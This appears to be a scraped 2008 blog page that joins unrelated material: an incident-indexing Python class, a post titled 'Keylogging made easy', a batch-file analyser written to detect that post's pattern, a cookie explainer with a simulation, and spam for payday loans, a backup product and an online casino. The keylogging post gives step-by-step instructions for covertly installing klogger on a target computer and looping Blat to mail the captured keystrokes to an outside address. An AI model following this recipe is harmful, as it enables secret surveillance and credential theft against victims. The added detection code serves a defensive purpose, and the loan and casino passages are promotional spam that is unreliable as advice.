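    and odd strings, queryable when the next attack shows up in the logs."""

    def __init__(self):
        self.incidents = []

    def record(self, day, source_ip, emails=(), strings=()):
        entry = {"day": day, "source_ip": source_ip,
                 "emails": list(emails), "strings": list(strings)}
        self.incidents.append(entry)
        return entry

    def linked(self, source_ip=None, emails=(), strings=()):
        """Return (prior incident, matched indicator) pairs sharing the same
        IP, the same normalised e-mail handle, or the same string."""
        handles = {normalise_handle(e) for e in emails}
        hits = []
        for inc in self.incidents:
            if source_ip and inc["source_ip"] == source_ip:
                hits.append((inc, "ip:" + source_ip))
            shared = handles & {normalise_handle(e) for e in inc["emails"]}
            for handle in sorted(shared):
                hits.append((inc, "handle:" + handle))
            for s in sorted(set(strings) & set(inc["strings"])):
                hits.append((inc, "string:" + s))
        return hits

    def dumps(self):
        return json.dumps(self.incidents)  # what you write to the disk

    @classmethod
    def loads(cls, blob):
        idx = cls()
        idx.incidents = json.loads(blob)
        return idx


def demo():
    """Constructed incidents: a first attack through one proxy, an unrelated
    one, then a new attack that matches the first on both IP and handle."""
    idx = IncidentIndex()
    idx.record("2008-03-02", "203.0.113.7",
               ["Blackjack 123@something.whatever"], ["14P"])
    idx.record("2008-04-15", "198.51.100.9")
    idx = IncidentIndex.loads(idx.dumps())  # round-trip through the saved copy
    new = idx.linked(source_ip="203.0.113.7",
                     emails=["Black_jack_45@something.znn.com"])
    return [(inc["day"], why) for inc, why in new]
```

Only the letters of the local part are compared, so "Blackjack 123" and "Black_jack_45" collide on purpose while a genuinely different handle does not; a match on IP alone is weaker evidence when the IP is a shared proxy, which is why each hit says which indicator it matched on.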
Keylogging made easy
Posted at Wednesday, July 09, 2008
You will need klogger from:
http://ntsecurity.nu/toolbox/klogger/
You will need a gmail account.
You will need blat from:
http://sourceforge.net/project/showfiles...p_id=81910
And Nircmd:
http://www.nirsoft.net/utils/nircmd.html
Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.
You should have blat.dll blat.exe blat.obj klogger and nircmd.
Ok now we are going to make two .bat files.
One is start.bat, which launches the keylogger and then the mailer loop:
nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat
The next one is go.bat and you will need to do some editing to it.
:THREE
REM the ping acts as a wait (about 100 seconds)
ping 127.0.0.1 -n 100 -w 1000 > nul
REM Blat takes the SMTP username with -u and the password with -pw (-p selects a saved profile)
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -pw password -f bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don't use my email address, use your own and your own password etc.
REM Test this Blat line by hand from a command prompt first: Gmail's SMTP servers require TLS for authenticated sending, which Blat does not provide on its own
goto THREE
You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.
Just drag your folder with these files to the target computer and run start.bat.
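An added example, not part of the post and not one of the tools it links: a Python check for the shape this pair of batch files has, a label/goto loop, a ping to localhost used as a sleep, and a command-line mailer shipping a local file to an outside address. The list of mailer commands beyond Blat is an assumption, and both sample batch files are constructed for the example with placeholder addresses.

```python
import re

# Assumed for this example: command-line mailers that take the file to
# send as their first argument. The post itself only uses Blat.
MAILER_COMMANDS = ("blat", "blat.exe", "sendemail", "mailsend")

LABEL_RE = re.compile(r"^:(\w+)$")
GOTO_RE = re.compile(r"^goto\s+:?(\w+)", re.IGNORECASE)
COMMENT_RE = re.compile(r"^(rem\b|::)", re.IGNORECASE)
PING_SLEEP_RE = re.compile(
    r"^ping\s+(?:127\.0\.0\.1|localhost)\s+-n\s+(\d+)", re.IGNORECASE)


def _flag_value(args, *flags):
    """Value following the first of the given flags, or None."""
    for i, arg in enumerate(args[:-1]):
        if arg.lower() in flags:
            return args[i + 1]
    return None


def analyse_batch(text):
    """Pick labels, gotos, ping sleeps and mailer calls out of a .bat and
    say whether together they form a mail-a-file-forever loop."""
    labels, gotos, sleeps, mailers = set(), [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or COMMENT_RE.match(line):
            continue  # REM / :: lines carry no behaviour
        if m := LABEL_RE.match(line):
            labels.add(m.group(1).upper())
        elif m := GOTO_RE.match(line):
            gotos.append(m.group(1).upper())
        elif m := PING_SLEEP_RE.match(line):
            # ping -n N sends N requests one second apart: about N-1 seconds
            sleeps.append(max(int(m.group(1)) - 1, 0))
        else:
            args = line.split()
            if args[0].lower() in MAILER_COMMANDS:
                has_file = len(args) > 1 and not args[1].startswith("-")
                mailers.append({
                    "file": args[1] if has_file else None,
                    "to": _flag_value(args, "-to", "-t"),
                    "server": _flag_value(args, "-server"),
                })
    loops = any(target in labels for target in gotos)
    return {
        "loop": loops,
        "sleep_seconds": sum(sleeps),
        "mailers": mailers,
        # the periodic-exfiltration shape: a mailer and a sleep inside a goto loop
        "exfil_loop": loops and bool(mailers) and bool(sleeps),
    }


# Constructed sample: the go.bat above, with placeholder addresses.
GO_BAT = """goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to drop@example.com -u drop@example.com -pw hunter2 -f drop@example.com -server smtp.example.com
goto THREE
"""

# Constructed sample: a report script that mails once and exits.
REPORT_BAT = """@echo off
dir C:\\backups > report.txt
blat report.txt -to ops@example.com -server mail.example.com
exit /b 0
"""
```

Running analyse_batch over GO_BAT reports a loop with a 99-second sleep sending klogger.txt to drop@example.com, while REPORT_BAT reports a mailer but no loop, which is the difference between a dropper and a nightly report.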
All About Cookies, You Must Know It
Posted at Wednesday, July 09, 2008
Internet cookies are incredibly simple, but they are one of those things that have taken on a life of their own. Cookies started receiving tremendous media attention starting in February 2000 because of Internet privacy concerns, and the debate still rages.
On the other hand, cookies provide capabilities that make the Web much easier to navigate. The designers of almost every major site use them because they provide a better user experience and make it much easier to gather accurate information about the site's visitors.
We will take a look at the basic technology behind cookies, as well as some of the features they enable. You will also have the opportunity to see a real-world example of what cookies can and cannot do using a sample page.
Cookie Basics
In April of 2000 I read an in-depth article on Internet privacy in a large, respected newspaper, and that article contained a definition of cookies. Paraphrasing, the definition went like this:
Cookies are programs that web sites put on your hard disk. They sit on your computer gathering information about you and everything you do on the Internet, and whenever the web site wants to it can download all of the information the cookie has collected.
Definitions like that are fairly common in the press. The problem is, none of that information is correct. Cookies are not programs, and they cannot run like a program does. Therefore they cannot gather any information on their own. Nor can they collect any personal information about you from your machine.
Here is a valid definition of a cookie:
A cookie is a piece of text that a web server can store on a user's hard disk. Cookies allow a web site to store information on a user's machine and later retrieve it. The pieces of information are stored as name-value pairs.
For example, a web site might generate a unique ID number for each visitor and store the ID number on each user's machine using a cookie file.
If you use Microsoft's Internet Explorer to browse the web, you can see all of the cookies that are stored on your machine. The most common place for them to reside is in a directory called c:\windows\cookies. When I look in that directory on my machine, I find 165 files. Each file is a text file that contains name-value pairs, and there is one file for each web site that has placed cookies on my machine.
You can see in the directory that each of these files is a simple, normal text file. You can see which web site placed the file on your machine by looking at the file name (the information is also stored inside the file). You can open each file up by clicking on it.
For example, I have visited goto.com, and the site has placed a cookie on my machine. The cookie file for goto.com contains the following information:
UserID A9A3BECE0563982D www.goto.com/
What goto.com has done is stored on my machine a single name-value pair. The name of the pair is UserID,and the value is A9A3BECE0563982D. The first time I visited goto.com, the site assigned me a unique ID value and stored it on my machine.
[Note that there probably are several other values stored in the file after the three shown above. That is housekeeping information for the browser.]
The vast majority of sites store just one piece of information -- a user ID -- on your machine. But there really is no limit -- a site can store as many name-value pairs as it likes.
A name-value pair is simply a named piece of data. It is not a program, and it cannot "do" anything. A web site can retrieve only the information that it has placed on your machine. It cannot retrieve information from other cookie files, nor any other information from your machine.
How Does Cookie Data Move?
As you saw in the previous section, cookie data is simply name-value pairs stored on your hard disk by a web site. That is all that cookie data is. The web site can store the data, and later it receives it back. A web site can only receive the data it has stored on your machine. It cannot look at any other cookie, nor can it look at anything else on your machine.
The data moves in the following manner:
If you type the URL of a web site into your browser, your browser sends a request to the web site for the page. For example, if you type the URL http://www.netcrackers.blogspot.com into your browser, your browser will contact Blogger's server and request its home page.
When the browser does this, it will look on your machine for a cookie file that Blogger has set. If it finds a Blogger cookie file, your browser will send all of the name-value pairs in the file to Blogger's server along with the URL. If it finds no cookie file, it will send no cookie data.
Blogger's web server receives the cookie data and the request for a page. If name-value pairs are received, Blogger can use them.
If no name-value pairs are received, Blogger knows that you have not visited before. The server creates a new ID for you in Blogger's database and then sends name-value pairs to your machine in the header for the web page it sends. Your machine stores the name-value pairs on your hard disk.
The web server can change name-value pairs or add new pairs whenever you visit the site and request a page.
There are other pieces of information that the server can send with the name-value pair. One of these is an expiration date. Another is a path (so that the site can associate different cookie values with different parts of the site). You have control over this process. You can set an option in your browser so that the browser informs you every time a site sends name-value pairs to you. You can then accept or deny the values.
How Do Web Sites Use Cookies?
Cookies evolved because they solve a big problem for the people who implement web sites. In the broadest sense, a cookie allows a site to store state information on your machine. This information lets a web site remember what state your browser is in. An ID is one simple piece of state information -- if an ID exists on your machine, the site knows that you have visited before. The state is, "Your browser has visited the site at least one time", and the site knows your ID from that visit.
Web sites use cookies in many different ways. Here are some of the most common examples:
Sites can accurately determine how many readers actually visit the site. It turns out that because of proxy servers, caching, concentrators and so on, the only way for a site to accurately count visitors is to set a cookie with a unique ID for each visitor. Using cookies, sites can:
->Determine how many visitors arrive
->Determine how many are new vs. repeat visitors
->Determine how often a visitor has visited
The way the site does this is by using a database. The first time a visitor arrives, the site creates a new ID in the database and sends the ID as a cookie. The next time the user comes back, the site can increment a counter associated with that ID in the database and know how many times that visitor returns.
Sites can store user preferences so that the site can look different for each visitor (often referred to as customization). For example, some sites offer you the ability to change content/layout/color, or allow you to enter your zip code and get customized weather information.
Most sites seem to store preferences like this in the site's database and store nothing but an ID as a cookie, but storing the actual values in name-value pairs is another way to do it.
Ecommerce sites can implement things like shopping carts and "quick checkout" options. The cookie contains an ID and lets the site keep track of you as you add different things to your cart. Each item you add to your shopping cart is stored in the site's database along with your ID value. When you check out, the site knows what is in your cart by retrieving all of your selections from the database. It would be impossible to implement a convenient shopping mechanism without cookies or something like it.
In all of these examples, note that what the database is able to store is things you have selected from the site, pages you have viewed from the site, information you give to the site in online forms, etc. All of the information is stored in the site's database, and a cookie containing your unique ID is all that is stored on your computer in most cases.
An Example
To give you a simple example of what cookies and a database can do, we can take the example of Verizon.com. They have created a simple history and statistics system for their articles. Their system runs on the Verizon servers and lets you view your activity on the Verizon site. Here's how it works:
When you visit Verizon for the first time, the server creates a unique ID number for you and stores a cookie on your machine containing that ID. For example, on the machine I am using now, this is what I see in the Verizon cookie file:
user 35005 www.verizon.com/
There is nothing magic about the number 35,005 -- it is simply an integer that they increment each time a new visitor arrives. I was user number 35,005 to come to the Verizon site since this cookie system was installed. We could make the ID value as elaborate as we desire -- many sites use IDs containing 20 digits or more.
Now, whenever you visit any page on Verizon, your browser sends your cookie containing the ID value back to the server. The server then saves a record in the database that contains the time that you downloaded the page and the URL, along with your ID.
To see the history of your activity on Verizon, you can go to this URL on the site:
http://www.verizon.com/history.php
Your browser sends your ID value from the cookie file to the server along with the URL. The history.php page runs a piece of code that queries the database and retrieves your history on the site. It also calculates a couple of interesting statistics. Then it creates a page and sends it to your browser.
Try the URL for the history page now:
http://www.verizon.com/history.php
Then go view a couple of other pages on Verizon and try it again. You will see that the statistics change and so does the list of files.
Problems with Cookies
Cookies are not a perfect state mechanism, but they certainly make a lot of things possible that would be impossible otherwise. Here are several of the things that make cookies imperfect.
People often share machines -- Any machine that is used in a public area, and many machines used in an office environment or at home, are shared by multiple people. Let's say that you use a public machine (in a library, for example) to purchase something from an on-line store. The store will leave a cookie on the machine, and someone could later try to purchase something from the store using your account. Stores usually post large warnings about this problem, and that is why. Even so, mistakes can happen.
On something like a Windows NT machine or a UNIX machine that uses accounts properly, this is not a problem. The accounts separate all of the users' cookies. Accounts are much more relaxed in other operating systems, and it is a problem.
If you try the example above on a public machine (in a library or school, for example), and if other people using the machine have visited Verizon, then the history URL may show a very long list of files.
Cookies get erased -- If you have a problem with your browser and call tech support, probably the first thing that tech support will ask you to do is to erase all of the temporary Internet files on your machine. When you do that you lose all of your cookie files. Now when you visit a site again, that site will think you are a new user and assign you a new cookie. This tends to skew the site's record of new versus return visitors, and it also can make it hard for you to recover previously stored preferences. This is why sites ask you to register in some cases -- if you register with a user name and a password, you can re-login even if you lose your cookie file and restore your preferences. If preference values are stored directly on the machine then recovery is impossible. That is why many sites now store all user information in a central database and store only an ID value on the user's machine.
If you erase your cookie file for Verizon and then revisit the history URL in the previous section, you will find that Verizon has no history for you. The site has to create a new ID and cookie file for you, and that new ID has no data stored against it in the database.
Multiple machines -- People often use more than one machine during the day. For example a machine in the office, a machine at home and a laptop for the road. Unless the site is specifically engineered to solve the problem, the result will be three unique cookie files on all three machines. Any site that I visit from all three machines will track me as three separate users. It can be annoying to set preferences three times. Again, a site that allows registration and stores preferences centrally may make it easy for me to have the same account on three machines, but the site developers must plan for this when designing the site. If you visit the history URL demonstrated in the previous section from one machine and then try it again from another, you will find that your history lists are different. This is because the server created two IDs for you on the two machines.
There are probably not any easy solutions to these problems, short of asking users to register and storing everything in a central database.
Why the Fury around Cookies?
If you have read the article to this point, you may be wondering why there has been such an uproar in the media about cookies and Internet privacy. You have seen in this article that cookies are benign text files, and you have also seen that they provide lots of useful capabilities on the web.
There are two things that have caused the strong reaction around cookies:
The first is something that has plagued consumers for decades but is now getting out of hand. Let's say that you purchase something from a traditional mail order catalog. The catalog company has your name, address and phone number from your order, and it also knows what items you have purchased. It can sell your information to others who might want to sell similar products to you. That is the fuel that makes telemarketing and junk mail possible.
On a web site, the site can track not only your purchases, but also the pages that you read, the ads that you click on, etc. If you then purchase something and enter your name and address, the site potentially knows much more about you than a traditional mail order company does. This makes targeting much more precise, and that makes a lot of people uncomfortable.
Different sites have different policies. Many companies have strict privacy policies and do not sell or share any personal information about customers with any third party except in cases where you specifically allow them to do so. Other companies aggregate information together and distribute it.
The second is new. There are certain infrastructure providers that can actually create cookies that are visible on multiple sites. Many firms use these companies to serve ad banners on their sites. These companies place small (1x1 pixel) GIF files on the site that allow them to load cookies on your machine. The companies can then track your movements across multiple sites. They can potentially see the search strings that you type into search engines (due more to the way some search engines implement their systems than to anything sinister being intended). Because they can gather so much information about you from multiple sites, the companies can form very rich profiles. These are still anonymous, but they are rich.
One company then went a step further: by acquiring another firm, it threatened to link these rich anonymous profiles back to name and address information, to personalize them, and then sell the data. That began to look very much like spying to most people, and that is what caused the uproar. Some companies are in a unique position to do this sort of thing, because they serve ads on so many sites. Cross-site profiling is not a capability available to individual sites, because cookies are site specific.
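An added example, not part of the original article: a Python simulation of both sides of the exchange described under "How Does Cookie Data Move?", the incrementing-ID history system from "An Example", what happens when the cookie file is erased, and the cross-site profiling just described. The browser keeps one bucket of name-value pairs per host and hands them back only to that host; a site hands out an ID on the first visit and logs requests against it; an ad host embedded on several pages sees the same ID from all of them. The blog hostname and the starting ID 35005 come from the text; ads.example, shop.example and news.example are assumed placeholder hosts, and nothing here touches the network.

```python
from urllib.parse import urlsplit


class CookieJar:
    """The browser side: one bucket of name-value pairs per host, handed
    back only to that host, and only for paths the cookie was scoped to."""

    def __init__(self):
        self._store = {}  # host -> {name: (value, path)}

    def receive(self, url, set_cookie_headers):
        """Store the name-value pairs a response carried in Set-Cookie."""
        bucket = self._store.setdefault(urlsplit(url).hostname, {})
        for header in set_cookie_headers:
            pairs = [p.strip() for p in header.split(";")]
            name, _, value = pairs[0].partition("=")
            attrs = {k.strip().lower(): v for k, _, v in
                     (p.partition("=") for p in pairs[1:])}
            if attrs.get("max-age") == "0":
                bucket.pop(name, None)  # the server asked for deletion
            else:
                bucket[name] = (value, attrs.get("path", "/"))

    def cookie_header(self, url):
        """Build the Cookie header for a request to url."""
        u = urlsplit(url)
        path = u.path or "/"
        return "; ".join(f"{n}={v}" for n, (v, p) in
                         self._store.get(u.hostname, {}).items()
                         if path.startswith(p))

    def erase(self):
        self._store.clear()  # what clearing temporary Internet files does


class Site:
    """The server side: hand out an incrementing ID on the first visit and
    log every request against that ID in a dict standing in for the database."""

    def __init__(self, host, cookie_name="UserID", first_id=35005):
        self.host, self.cookie_name, self.next_id = host, cookie_name, first_id
        self.db = {}  # id -> list of pages requested

    def handle(self, path, cookie_header, referer=None):
        cookies = dict(p.split("=", 1) for p in cookie_header.split("; ") if p)
        set_cookie = []
        uid = cookies.get(self.cookie_name)
        if uid is None:  # no cookie came back, so this is a new visitor
            uid, self.next_id = str(self.next_id), self.next_id + 1
            set_cookie.append(f"{self.cookie_name}={uid}; Path=/")
        # An ad host records the embedding page (the Referer), not its GIF URL
        self.db.setdefault(uid, []).append(referer or path)
        body = self.db[uid] if path == "/history.php" else "page"
        return uid, body, set_cookie


def browse(jar, site, url, referer=None):
    """One request/response round trip between the jar and a site."""
    uid, body, set_cookie = site.handle(urlsplit(url).path or "/",
                                        jar.cookie_header(url), referer)
    jar.receive(url, set_cookie)
    return uid, body


def run_scenario():
    """Constructed walk-through: a blog visit, the same ad pixel on two
    unrelated pages, the history page, then an erased cookie file."""
    blog = Site("www.netcrackers.blogspot.com")
    ads = Site("ads.example", cookie_name="AdID", first_id=1)
    jar = CookieJar()
    b = "http://www.netcrackers.blogspot.com"
    first, _ = browse(jar, blog, b + "/")
    second, _ = browse(jar, blog, b + "/2008/07/cookies.html")
    browse(jar, ads, "http://ads.example/pixel.gif",
           referer=b + "/2008/07/cookies.html")
    browse(jar, ads, "http://ads.example/pixel.gif",
           referer="http://shop.example/cart")
    _, history = browse(jar, blog, b + "/history.php")
    ad_id, profile = browse(jar, ads, "http://ads.example/history.php",
                            referer="http://news.example/")
    sent_to_blog = jar.cookie_header(b + "/")  # all the blog ever sees
    jar.erase()
    after_erase, _ = browse(jar, blog, b + "/")
    return {"first": first, "second": second, "after_erase": after_erase,
            "history": list(history), "ad_id": ad_id,
            "profile": list(profile), "sent_to_blog": sent_to_blog}
```

The blog only ever receives its own UserID pair, never the AdID, which is the sense in which cookies are site specific; the ad host nonetheless ends up with a list of pages on three different sites against one ID, and erasing the jar turns the next blog visit into user 35006 with an empty history.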
State Licensed Cash Advances
Posted at Wednesday, July 09, 2008
If you run into unforeseen expenses, you can get trapped by debt in the middle of the month. You cannot avoid these expenses, but you can choose a way to deal with them, such as a payday loan. There are many benefits to obtaining a payday loan. One payday loan provider with a new approach to delivering low costs and better service is PayDay One, at www.paydayone.com. To obtain a loan, you must have a valid checking account and an email address. In most cases loans are funded the next business day without requiring any faxing of information, unless they are unable to verify your application details. "Great rates" means rates as compared to other similarly licensed online lenders. PayDay One and its affiliates offer payday advances, installment loans and credit services only to residents of states where permitted by law, to relieve cash shortfalls during financial crunches. It is a short-term loan, to be repaid by the next payday. It helps you meet liquidity needs in the middle of the month, and it spares you from asking friends and family members for money. People use payday loans to ease the burden of debt until the next payday.
Unlike other payday loan lenders, Payday One offers:
- Great Rate Guarantee
- No faxing or waiting in lines
- Secure online loan application
- Apply 24/7 from home or work
- Low credit scores are no problem
Payday One offers no-fax payday loans with a 24-hour turnaround and direct wire into customer accounts. Its loan application is easy and secure. Anyone can apply online or by telephone, and everyone gets an answer in seconds. All that one needs to apply for a loan from PayDay One is an email address, an active checking account, and a job or regular source of income. And lest I forget, a loan applicant must also be at least 18 years old and a citizen of the United States.
Payday One, through its site, is dedicated to payday loans. They specialize in getting you a low-interest loan for emergencies or just to get you through to the next month. Payday One is one of the state-licensed cash advance lenders in the United States, not an offshore payday lending company, so you can rest assured that they are a good company. When you're in an emergency situation, you can count on Payday One to deliver quick 24-hour turnarounds. It's better than walking into a public establishment. Unlike other payday loan lenders, Payday One offers great rates. They guarantee it.
ARAID Automated Data Backup - Never Lose Data Again
Posted at Friday, July 04, 2008
Many corporate employees do not back up the important files on their PCs, which risks losing data when a computer problem or a hard disk crash occurs. Important files on a hard disk need to be backed up as a precaution, because once a disk has crashed there is nothing you can do to get the data back. The Accordance Systems ARAID makes backing up effortless for computer users: files are automatically backed up to the ARAID disks each time the user saves to a designated folder on the hard drive.
ARAID backs up automatically, without interrupting the user's ongoing work. Having a backup and additional data storage is very important to keeping your data safe, and ARAID helps employees prevent such data loss. PC data protection matters especially because viruses and trojans are all over the Internet, and many of them destroy data beyond recovery. Backing up with the Accordance Systems ARAID makes your data safer. ARAID supports PC RAID setups such as SATA RAID and IDE RAID, and data in a RAID system is safe if you use the ARAID product from Accordance Systems. For more information about purchasing ARAID, visit their website and learn how it protects your data.
Online Casino Directory
Posted at Friday, July 04, 2008
Do you want to play online casino games? Do you want to know which are the best online casino sites today? Online Casino Directory offers casino game guides and reviews. If you are a beginner, this is the right place to find the best online casino site, and you can learn how to play casino games before risking any money. Through its website, www.onlinecasinosdir.com, Online Casino Directory provides a directory of online casinos with information to help you decide which sites are the best to play at. Online casinos are fast becoming a growing influence on the Internet, as you can see from the countless online casino websites that have mushroomed in the recent past. The site has free casino game guides with rules for a variety of games such as Bingo, Craps, Blackjack, Roulette, Online Slots, Texas Holdem and Video Poker.
Online Casino Directory is a good resource for online casino reviews. It covers several major providers of casino software: Microgaming, Playtech, Vegas Technology and RTG. You will also find casino news and rankings of the best online casinos of today. A casino bonus is a way for online casinos to welcome you, reward your first deposit and make you want to come back for more; each casino sets its own requirements for bonuses, such as play-through requirements. With more online casino sites opening every day, Online Casino Directory also updates its information about every new site that gains popularity, so you are not left behind when it comes to the latest sites on the market. Online Casino Directory also makes sure that all your dealings are completely secure and that your personal information is not shared or sold to any other organization or individual.